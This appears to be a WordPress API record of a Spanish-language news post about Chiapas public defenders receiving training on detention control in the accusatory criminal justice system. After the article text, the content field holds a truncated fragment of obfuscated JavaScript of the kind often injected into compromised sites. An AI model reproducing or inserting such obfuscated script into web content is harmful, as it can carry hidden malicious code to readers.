{"id":2633,"date":"2022-06-06T02:17:59","date_gmt":"2022-06-06T02:17:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2633"},"modified":"2022-06-06T02:18:00","modified_gmt":"2022-06-06T02:18:00","slug":"continua-poder-judicial-capacitando-a-defensores-publicos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2633","title":{"rendered":"Contin\u00faa Poder Judicial capacitando a defensores p\u00fablicos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"739\" height=\"415\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-03-at-1.41.49-PM-1.jpeg\" alt=\"\" class=\"wp-image-2634\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-03-at-1.41.49-PM-1.jpeg 739w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-03-at-1.41.49-PM-1-300x168.jpeg 300w\" sizes=\"auto, (max-width: 739px) 100vw, 739px\" \/><figcaption>05 de junio del 2022  <\/figcaption><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez; Chiapas.- Como parte de las acciones para mejorar los servicios que brinda el Poder Judicial de estado de Chiapas, se prioriza la capacitaci\u00f3n a las y los spervidores p\u00fablicos de esta casa de la justicia, como ha instruido el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan \u00d3scar Trinidad Palacios.En ese sentido, el Instituto de la Defensor\u00eda P\u00fablica, que dirige Jorge Alberto Selvas Culebro, ha implementado cursos de capacitaci\u00f3n a las y los defensores p\u00fablicos sobre el Sistema de Justicia Penal Acusatorio, para coadyuvar en las garant\u00edas de justicia en Chiapas.Siguiendo esta l\u00ednea de trabajo, se llev\u00f3 a cabo el curso denominado Control de la Detenci\u00f3n, impartido por el titular de la Unidad T\u00e9cnica Especializada en el Sistema Acusatorio Penal, Jorge Alberto N\u00fa\u00f1ez Echeverr\u00eda; dicho curso, fue en modalidad presencial en el aula ubicada en el Instituto de Defensor\u00eda P\u00fablica, la cual se cre\u00f3 en beneficio del desarrollo de actividades de esta \u00edndole.Dichos cursos, se crearon con el objetivo fortalecer y actualizar los conocimientos en el Sistema de Justicia Penal de corte acusatorio, siguiendo el lineamiento de una b\u00fasqueda permanente de mejora, que existe en el Instituto de Defensor\u00eda P\u00fablica.Con estas acciones, que permiten al personal, estar a la vanguardia y brindar un servicio m\u00e1s eficiente de defensor\u00eda t\u00e9cnica y adecuada, se demuestra el compromiso que tiene el Poder Judicial del Estado con la ciudadan\u00eda chiapaneca y con sus servidores p\u00fablicos.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>05 de junio del 2022 Tuxtla Guti\u00e9rrez; Chiapas.- Como parte de las acciones para mejorar los servicios que brinda el Poder Judicial de estado de Chiapas, se prioriza la capacitaci\u00f3n a las y los spervidores p\u00fablicos de esta casa de la justicia, como ha instruido el magistrado presidente del Tribunal Superior de Justicia y del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2633","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2633"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2633\/revisions"}],"predecessor-version":[{"id":2635,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2633\/revisions\/2635"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2633"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2633"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}